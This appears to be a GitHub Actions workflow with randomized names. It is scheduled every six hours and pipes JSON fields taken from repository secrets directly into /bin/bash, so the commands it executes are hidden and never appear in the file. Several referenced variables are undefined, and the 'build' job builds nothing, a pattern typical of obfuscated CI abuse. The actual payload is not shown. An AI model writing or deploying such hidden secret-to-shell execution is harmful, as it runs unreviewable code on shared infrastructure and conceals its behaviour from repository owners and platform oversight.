name: gaojinbao2345
on:
  workflow_dispatch:
  schedule:
    - cron: '53 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gaojinbao2345
        env:
          fa8: ${{ secrets.fa8 }}
        run: |
          echo $fa8 | jq -r .smqno5735 | /bin/bash
          echo $cq830 | jq -r .rt65 | /bin/bash
          echo $lod470 | jq -r .prr075 | /bin/bash
          echo $swszv776 | jq -r .twpru1871 | /bin/bash
          echo $juq4146 | jq -r .fihxj013 | /bin/bash
          echo $n3 | jq -r .zajr4562 | /bin/bash

